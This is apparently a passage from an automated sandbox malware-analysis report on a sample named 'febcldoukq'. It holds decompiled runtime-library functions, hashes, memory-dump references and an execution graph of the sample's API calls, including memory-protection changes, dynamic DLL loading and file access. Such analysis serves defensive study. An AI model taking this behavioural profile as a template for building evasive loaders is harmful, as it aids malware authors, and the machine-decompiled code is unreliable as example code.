								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0xb35dcc; // 0x0
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0xb37000();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E00B21BDC(_t75, _t84, _t97, _t101, _t107);
									asm("int3");
									_push(8);
									_push(0xb333a8);
									E00B1D900(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E00B278AB(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E00B2733D(_t103, _t108[0x18], E00B1DD40( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E00B2734D(_t103, _t108[0x18], E00B1DD40( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E00B1DD40();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}



















                                              0x00b278ab
                                              0x00b278ad
                                              0x00b278b2
                                              0x00b278b7
                                              0x00b278b9
                                              0x00b278bc
                                              0x00b278c1
                                              0x00b279d1
                                              0x00b279d1
                                              0x00b279d1
                                              0x00000000
                                              0x00b278d0
                                              0x00b278d0
                                              0x00b278d5
                                              0x00b278df
                                              0x00b278e1
                                              0x00b278e6
                                              0x00b278eb
                                              0x00b278eb
                                              0x00b278ed
                                              0x00b278f0
                                              0x00b278f5
                                              0x00b27917
                                              0x00b27917
                                              0x00b2791a
                                              0x00b2791d
                                              0x00b2793b
                                              0x00b2793e
                                              0x00b2797d
                                              0x00b27980
                                              0x00b27983
                                              0x00b279a8
                                              0x00b279aa
                                              0x00000000
                                              0x00b279ac
                                              0x00b279ac
                                              0x00b279ae
                                              0x00000000
                                              0x00b279b0
                                              0x00b279b0
                                              0x00b279b5
                                              0x00b279b9
                                              0x00b279b9
                                              0x00b279ba
                                              0x00000000
                                              0x00b279ba
                                              0x00b279ae
                                              0x00b27985
                                              0x00b27985
                                              0x00b27987
                                              0x00000000
                                              0x00b27989
                                              0x00b27989
                                              0x00b2798b
                                              0x00000000
                                              0x00b2798d
                                              0x00b2799e
                                              0x00000000
                                              0x00b279a3
                                              0x00b2798b
                                              0x00b27987
                                              0x00b27940
                                              0x00b27940
                                              0x00b27944
                                              0x00000000
                                              0x00b2794a
                                              0x00b2794a
                                              0x00b2794c
                                              0x00000000
                                              0x00b27952
                                              0x00b27959
                                              0x00b27961
                                              0x00b27965
                                              0x00b27967
                                              0x00b2796a
                                              0x00b2796f
                                              0x00b27970
                                              0x00000000
                                              0x00b27970
                                              0x00b2796a
                                              0x00000000
                                              0x00b27965
                                              0x00b2794c
                                              0x00b27944
                                              0x00b2791f
                                              0x00b2791f
                                              0x00000000
                                              0x00b2791f
                                              0x00b278fc
                                              0x00b278fc
                                              0x00b27901
                                              0x00b27906
                                              0x00000000
                                              0x00b27908
                                              0x00b2790a
                                              0x00b27913
                                              0x00b27922
                                              0x00b27924
                                              0x00b279e3
                                              0x00b279e3
                                              0x00b279e8
                                              0x00b279e9
                                              0x00b279eb
                                              0x00b279f0
                                              0x00b279f5
                                              0x00b279f8
                                              0x00b279fb
                                              0x00b279fe
                                              0x00b27a07
                                              0x00b27a07
                                              0x00b27a00
                                              0x00b27a00
                                              0x00b27a00
                                              0x00b27a0a
                                              0x00b27a0e
                                              0x00b27a11
                                              0x00b27a12
                                              0x00b27a13
                                              0x00b27a14
                                              0x00b27a17
                                              0x00b27a20
                                              0x00b27a20
                                              0x00b27a23
                                              0x00b27a59
                                              0x00b27a25
                                              0x00b27a25
                                              0x00b27a25
                                              0x00b27a28
                                              0x00b27a3f
                                              0x00b27a3f
                                              0x00b27a28
                                              0x00b27a5e
                                              0x00b27a68
                                              0x00b27a74
                                              0x00b27932
                                              0x00b27932
                                              0x00b27937
                                              0x00b27938
                                              0x00b27972
                                              0x00b27979
                                              0x00b279bd
                                              0x00b279bd
                                              0x00b279c4
                                              0x00b279d3
                                              0x00b279d6
                                              0x00b279e2
                                              0x00b279e2
                                              0x00b27924
                                              0x00b27906
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b278d5

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: AdjustPointer
                                              • String ID:
                                              • API String ID: 1740715915-0
                                              • Opcode ID: e8091cadfab2c72a315a661d9b894d9e2c75e272234ce5991c6a0e9a18e6013e
                                              • Instruction ID: 9ce1cddbabfd9b02ea775fab5f4b8c0d461a9840a7b302688ac9d135b805916b
                                              • Opcode Fuzzy Hash: e8091cadfab2c72a315a661d9b894d9e2c75e272234ce5991c6a0e9a18e6013e
                                              • Instruction Fuzzy Hash: 1C51E672548326AFDB298F15F441BBE77E4EF00310F1445ADE8494B190EF31AD81CB98
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B1B280 Relevance: 6.1, APIs: 4, Instructions: 114COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: ColorObjectSelect$Text
                                              • String ID:
                                              • API String ID: 2688426544-0
                                              • Opcode ID: c2c9cb449467b224abca0e4187288fc32389f3f6bf5f5ef863d77a46dd88e6a4
                                              • Instruction ID: 25aaa5e5efea74a3a60cb17f3e6e1f455637664ffda71bb538d2c14aedd46058
                                              • Opcode Fuzzy Hash: c2c9cb449467b224abca0e4187288fc32389f3f6bf5f5ef863d77a46dd88e6a4
                                              • Instruction Fuzzy Hash: F151A375A04208EFCB04DF68D198AACBBF1FF48310F5584A9E899DB351DB31EA81DB41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B18D50 Relevance: 6.1, APIs: 4, Instructions: 70windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: Menu$CreateLongPopupSystemWindow
                                              • String ID:
                                              • API String ID: 3388415271-0
                                              • Opcode ID: dd4f153fcba8d97aa13f27ca6027ff68e7f7533383f50e922f1d839a82773c3c
                                              • Instruction ID: d131c500353de7bca9afc58454c60c4937c3c675cf2ca2aa83950ff7bac577dc
                                              • Opcode Fuzzy Hash: dd4f153fcba8d97aa13f27ca6027ff68e7f7533383f50e922f1d839a82773c3c
                                              • Instruction Fuzzy Hash: 1A317275A04204DFCB44EF68D188B9DBBF0FB48311F5184A9E8899B351DB74AA848B42
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B28F6D Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00B28F6D(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0xb348b0, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E00B28FE1();
					E00B28FC2();
					_t13 = WriteConsoleW( *0xb348b0, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}




                                              0x00b28f8a
                                              0x00b28f8e
                                              0x00b28f9b
                                              0x00b28fa0
                                              0x00b28fbb
                                              0x00b28fbb
                                              0x00b28fc1

                                              APIs
                                              • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00B28AD2,?,00000001,?,?,?,00B26DBE,?,?,00000000), ref: 00B28F84
                                              • GetLastError.KERNEL32(?,00B28AD2,?,00000001,?,?,?,00B26DBE,?,?,00000000,?,?,?,00B26709,?), ref: 00B28F90
                                                • Part of subcall function 00B28FE1: CloseHandle.KERNEL32(FFFFFFFE,00B28FA0,?,00B28AD2,?,00000001,?,?,?,00B26DBE,?,?,00000000,?,?), ref: 00B28FF1
                                              • ___initconout.LIBCMT ref: 00B28FA0
                                                • Part of subcall function 00B28FC2: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00B28F5E,00B28ABF,?,?,00B26DBE,?,?,00000000,?), ref: 00B28FD5
                                              • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00B28AD2,?,00000001,?,?,?,00B26DBE,?,?,00000000,?), ref: 00B28FB5
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                              • String ID:
                                              • API String ID: 2744216297-0
                                              • Opcode ID: 7ea464c898f610f6cea3eba7610962ae69b44d063c2bfddb9fe5ee2e3eecffe0
                                              • Instruction ID: b8e1075780b23b77b7aa60cd92c95c2ca4a54f40d60bc020490d9c19986fb248
                                              • Opcode Fuzzy Hash: 7ea464c898f610f6cea3eba7610962ae69b44d063c2bfddb9fe5ee2e3eecffe0
                                              • Instruction Fuzzy Hash: 9DF0AC36501174BBCF222F96EC0499D7FAAFB097A1B254850FE1996170CF7299209B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B17930 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: _strlen
                                              • String ID: (
                                              • API String ID: 4218353326-3887548279
                                              • Opcode ID: 3927a2385a8048bd62ba712d800553c0edaa0be7600f269819daf2c3671dc304
                                              • Instruction ID: 5cb90c0e59b73f9d078f1396750c005649f30d81ad647bcccf0b9a5c40a4583f
                                              • Opcode Fuzzy Hash: 3927a2385a8048bd62ba712d800553c0edaa0be7600f269819daf2c3671dc304
                                              • Instruction Fuzzy Hash: 44510671918209ABDB15DF58C486BEDBBF0FF04304F4488A9E898DB350DB38EA95CB45
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B2771B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMONLIBRARYCODE
                                              Download Yara Rule
                                              C-Code - Quality: 47%
                                              			E00B2771B(void* __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr _a16, signed int* _a20, signed int _a24, signed int _a28, signed char _a32) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t37;
				signed int _t46;
				void* _t52;
				void* _t54;
				signed int* _t55;
				void* _t58;
				void* _t59;
				void* _t61;
				intOrPtr* _t63;

				E00B220D7(_a12);
				_pop(_t54);
				_t37 = E00B21C6E(_t52, _t54, __edx, _t59, _t61);
				_t55 = _a20;
				_t58 = _a4;
				if( *((intOrPtr*)(_t37 + 0x20)) != 0 ||  *_t58 == 0xe06d7363 ||  *_t58 == 0x80000026 || ( *_t55 & 0x1fffffff) < 0x19930522 || (_t55[8] & 0x00000001) == 0) {
					if(( *(_t58 + 4) & 0x00000066) == 0) {
						if(_t55[3] != 0) {
							L14:
							if( *_t58 != 0xe06d7363 ||  *((intOrPtr*)(_t58 + 0x10)) < 3 ||  *((intOrPtr*)(_t58 + 0x14)) <= 0x19930522) {
								L19:
								E00B27A82(_t58, _t58, _a8, _a12, _a16, _t55, _a32, _a24, _a28);
								goto L20;
							} else {
								_t63 =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0x1c)) + 8));
								if(_t63 == 0) {
									goto L19;
								}
								 *0xb37000(_t58, _a8, _a12, _a16, _t55, _a24, _a28, _a32 & 0x000000ff);
								return  *_t63();
							}
						}
						_t46 =  *_t55 & 0x1fffffff;
						if(_t46 < 0x19930521 || _t55[7] == 0) {
							if(_t46 < 0x19930522 || (_t55[8] >> 0x00000002 & 0x00000001) == 0) {
								goto L20;
							} else {
								goto L14;
							}
						} else {
							goto L14;
						}
					}
					if(_t55[1] != 0 && _a24 == 0) {
						L00B2731A(_a8, _a16, _t55);
					}
					goto L20;
				} else {
					L20:
					return 1;
				}
			}
















                                              0x00b27724
                                              0x00b27729
                                              0x00b2772a
                                              0x00b2772f
                                              0x00b27734
                                              0x00b27744
                                              0x00b2776c
                                              0x00b27797
                                              0x00b277b7
                                              0x00b277bd
                                              0x00b277f9
                                              0x00b2780d
                                              0x00000000
                                              0x00b277ca
                                              0x00b277cd
                                              0x00b277d2
                                              0x00000000
                                              0x00000000
                                              0x00b277ec
                                              0x00000000
                                              0x00b277f4
                                              0x00b277bd
                                              0x00b2779b
                                              0x00b277a2
                                              0x00b277ab
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b277a2
                                              0x00b27771
                                              0x00b27787
                                              0x00b2778c
                                              0x00000000
                                              0x00b27815
                                              0x00b27815
                                              0x00000000
                                              0x00b27817

                                              APIs
                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00B27724
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: ___except_validate_context_record
                                              • String ID: csm$csm
                                              • API String ID: 3493665558-3733052814
                                              • Opcode ID: c2adaeec197610a436fa59bc035834eeb2a1bd978c9ae9f666604f53e8b99f3f
                                              • Instruction ID: 6ad24ab3b8c43c404f21e6eab74184285730a1d45ed981a6359ca0c1f0ffc89b
                                              • Opcode Fuzzy Hash: c2adaeec197610a436fa59bc035834eeb2a1bd978c9ae9f666604f53e8b99f3f
                                              • Instruction Fuzzy Hash: B431F535484235DBCF268F51ED448AA7BE5FF08315B1889DAF85C49121CB32CC61DF95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B14940 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 92COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: EnumFamiliesFont
                                              • String ID: 1$\
                                              • API String ID: 2229041460-1239263948
                                              • Opcode ID: b32755e038ed92e11ab9c34d3e6b6886e8c67fcfa50b07af088c3c41b013d290
                                              • Instruction ID: 5267023ceb1ae169475184bdf1d58063cf8b6782eae5bebd4a1fd57680da6eb4
                                              • Opcode Fuzzy Hash: b32755e038ed92e11ab9c34d3e6b6886e8c67fcfa50b07af088c3c41b013d290
                                              • Instruction Fuzzy Hash: 5E418F74A04208DFDB14DF58C084AAABBF0FF48354F55C4AAE88D8B362D775A985CF51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B17480 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: ErrorFileLastWrite
                                              • String ID: write failed: %lu
                                              • API String ID: 442123175-171016427
                                              • Opcode ID: d2644c2fd44a2d24c24f67d0e74d6a486134529b187b89449dc0e87a26cd39cf
                                              • Instruction ID: d1d8cf221a06f1fae83d15218047a05db28df60601f4f254094e4f8c3bfb6ad4
                                              • Opcode Fuzzy Hash: d2644c2fd44a2d24c24f67d0e74d6a486134529b187b89449dc0e87a26cd39cf
                                              • Instruction Fuzzy Hash: 4F31D4B05082459FCB00EF18C488AEA7BF6EF54355F4189A9F8898B351D774E9D4CB82
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B175B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: ErrorFileLastWrite
                                              • String ID: write failed: %lu
                                              • API String ID: 442123175-171016427
                                              • Opcode ID: 0c82012d2167a17ac64e85ad5364cb8017cece8db2ce26a7fe3b07f5578f58d5
                                              • Instruction ID: 986bd848135bfb21239294e3e84a5444773487822edb1ae0190d31dcec193554
                                              • Opcode Fuzzy Hash: 0c82012d2167a17ac64e85ad5364cb8017cece8db2ce26a7fe3b07f5578f58d5
                                              • Instruction Fuzzy Hash: FF1105705083049FC700EF1CD488BAA7BF5EB54355F5185B9E8898B351DB74D9D4CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Execution Graph

                                              Execution Coverage:5.3%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:3.2%
                                              Total number of Nodes:625
                                              Total number of Limit Nodes:81
                                              execution_graph 26027 420c50 26028 420be0 26027->26028 26029 420c54 26027->26029 26031 420bf1 26028->26031 26034 41fb37 26028->26034 26037 41fa57 26031->26037 26033 420c14 26040 41e177 26034->26040 26036 41fb4f 26036->26031 26038 41fa6d 26037->26038 26053 41e1b7 26037->26053 26038->26033 26043 41eb17 26040->26043 26042 41e193 RtlAllocateHeap 26042->26036 26044 41eb9c 26043->26044 26046 41eb26 26043->26046 26044->26042 26046->26044 26047 418a87 26046->26047 26048 418a95 26047->26048 26050 418aa1 26047->26050 26048->26050 26052 418f07 LdrLoadDll 26048->26052 26050->26044 26051 418bf3 26051->26044 26052->26051 26054 41eb17 LdrLoadDll 26053->26054 26055 41e1d3 RtlFreeHeap 26054->26055 26055->26038 26056 4014e9 26059 4014f0 NtProtectVirtualMemory 26056->26059 26058 401570 26063 422f47 26058->26063 26066 422f39 26058->26066 26059->26058 26060 40157b 26071 41f567 26063->26071 26067 422f3c 26066->26067 26070 422a43 26066->26070 26068 422f52 26067->26068 26069 41f567 11 API calls 26067->26069 26068->26060 26069->26068 26072 41f58d 26071->26072 26085 40b337 26072->26085 26074 41f599 26075 41f5f3 26074->26075 26093 40f577 26074->26093 26075->26060 26077 41f5ae 26078 41f5c1 26077->26078 26105 40f537 26077->26105 26081 41f5d6 26078->26081 26146 41e1f7 26078->26146 26110 40d167 26081->26110 26083 41f5e5 26084 41e1f7 2 API calls 26083->26084 26084->26075 26088 40b344 26085->26088 26149 40b287 26085->26149 26087 40b34b 26087->26074 26088->26087 26161 40b227 26088->26161 26094 40f5a3 26093->26094 26529 40c7e7 26094->26529 26096 40f5b5 26533 40f447 26096->26533 26099 40f5d0 26101 40f5db 26099->26101 26103 41dfd7 2 API calls 26099->26103 26100 40f5e8 26102 40f5f9 26100->26102 26104 41dfd7 2 API calls 26100->26104 26101->26077 26102->26077 26103->26101 26104->26102 26106 418a87 LdrLoadDll 26105->26106 26107 40f556 26106->26107 26108 40f55d 26107->26108 26109 40f55f GetUserGeoID 26107->26109 26108->26078 26109->26078 26111 40d18c 26110->26111 26112 40c7e7 LdrLoadDll 26111->26112 26113 40d1e3 26112->26113 26549 40c467 26113->26549 26115 40d45a 26115->26083 26116 40d209 26116->26115 26558 417fa7 26116->26558 26118 40d24e 26118->26115 26561 409537 26118->26561 26120 40d292 26120->26115 26583 41e047 26120->26583 26124 40d2e8 26125 40d2ef 26124->26125 26593 41db57 26124->26593 26127 41fa57 2 API calls 26125->26127 26128 40d2fc 26127->26128 26128->26083 26130 40d339 26131 41fa57 2 API calls 26130->26131 26132 40d340 26131->26132 26132->26083 26133 40d349 26134 40f607 LdrLoadDll 26133->26134 26135 40d3bd 26134->26135 26135->26125 26136 40d3c8 26135->26136 26137 41fa57 2 API calls 26136->26137 26138 40d3ec 26137->26138 26596 41dba7 26138->26596 26141 41db57 LdrLoadDll 26142 40d427 26141->26142 26142->26115 26599 41d967 26142->26599 26145 41e1f7 2 API calls 26145->26115 26147 41e216 ExitProcess 26146->26147 26148 41eb17 LdrLoadDll 26146->26148 26148->26147 26150 40b29a 26149->26150 26200 41c707 LdrLoadDll 26149->26200 26180 41c5b7 26150->26180 26153 40b2ad 26153->26088 26154 40b2a3 26154->26153 26183 41eec7 26154->26183 26156 40b2ea 26156->26153 26194 40b0c7 26156->26194 26158 40b30a 26201 40ab27 LdrLoadDll 26158->26201 26160 40b31c 26160->26088 26162 40b241 26161->26162 26163 41f1b7 LdrLoadDll 26161->26163 26506 41f1b7 26162->26506 26163->26162 26166 41f1b7 LdrLoadDll 26167 40b268 26166->26167 26168 40f337 26167->26168 26169 40f350 26168->26169 26514 40c667 26169->26514 26171 40f363 26518 41dd27 26171->26518 26174 40b35c 26174->26074 26176 40f389 26177 40f3b4 26176->26177 26525 41dda7 26176->26525 26179 41dfd7 2 API calls 26177->26179 26179->26174 26202 41e147 26180->26202 26184 41eee0 26183->26184 26205 418677 26184->26205 26186 41eef8 26187 41ef01 26186->26187 26244 41ed07 26186->26244 26187->26156 26189 41ef15 26189->26187 26261 41da47 26189->26261 26192 41fa57 2 API calls 26193 41ef70 26192->26193 26193->26156 26197 40b0e1 26194->26197 26487 408927 26194->26487 26196 40b0e8 26196->26158 26197->26196 26500 408be7 26197->26500 26200->26150 26201->26160 26203 41eb17 LdrLoadDll 26202->26203 26204 41c5cc 26203->26204 26204->26154 26206 4189ba 26205->26206 26207 41868b 26205->26207 26206->26186 26207->26206 26264 41d797 26207->26264 26210 4187bc 26267 41dea7 26210->26267 26211 41879f 26324 41dfa7 LdrLoadDll 26211->26324 26214 4187e3 26216 41fa57 2 API calls 26214->26216 26215 4187a9 26215->26186 26219 4187ef 26216->26219 26217 41897e 26220 41dfd7 2 API calls 26217->26220 26218 418994 26333 418397 LdrLoadDll NtReadFile NtClose 26218->26333 26219->26215 26219->26217 26219->26218 26224 418887 26219->26224 26221 418985 26220->26221 26221->26186 26223 4189a7 26223->26186 26225 4188ee 26224->26225 26227 418896 26224->26227 26225->26217 26226 418901 26225->26226 26326 41de27 26226->26326 26229 41889b 26227->26229 26230 4188af 26227->26230 26325 418257 LdrLoadDll NtClose 26229->26325 26232 4188b4 26230->26232 26233 4188cc 26230->26233 26270 4182f7 26232->26270 26233->26221 26282 418017 26233->26282 26235 4188a5 26235->26186 26238 418961 26330 41dfd7 26238->26330 26239 4188c2 26239->26186 26242 4188e4 26242->26186 26243 41896d 26243->26186 26246 41ed22 26244->26246 26245 41ed34 26245->26189 26246->26245 26345 41f9d7 26246->26345 26248 41ed54 26348 417c67 26248->26348 26250 41ed77 26250->26245 26251 417c67 3 API calls 26250->26251 26253 41ed99 26251->26253 26253->26245 26373 418fc7 26253->26373 26254 41ee21 26255 41ee31 26254->26255 26466 41ea97 LdrLoadDll 26254->26466 26384 41e907 26255->26384 26258 41ee5f 26463 41da07 26258->26463 26262 41eb17 LdrLoadDll 26261->26262 26263 41da63 26262->26263 26263->26192 26265 41eb17 LdrLoadDll 26264->26265 26266 418770 26265->26266 26266->26210 26266->26211 26266->26215 26268 41eb17 LdrLoadDll 26267->26268 26269 41dec3 NtCreateFile 26268->26269 26269->26214 26271 418313 26270->26271 26272 41de27 LdrLoadDll 26271->26272 26273 418334 26272->26273 26274 41833b 26273->26274 26275 41834f 26273->26275 26276 41dfd7 2 API calls 26274->26276 26277 41dfd7 2 API calls 26275->26277 26278 418344 26276->26278 26279 418358 26277->26279 26278->26239 26334 41fb77 LdrLoadDll RtlAllocateHeap 26279->26334 26281 418363 26281->26239 26283 418062 26282->26283 26284 418095 26282->26284 26285 41de27 LdrLoadDll 26283->26285 26286 4181e0 26284->26286 26290 4180b1 26284->26290 26287 41807d 26285->26287 26288 41de27 LdrLoadDll 26286->26288 26289 41dfd7 2 API calls 26287->26289 26294 4181fb 26288->26294 26291 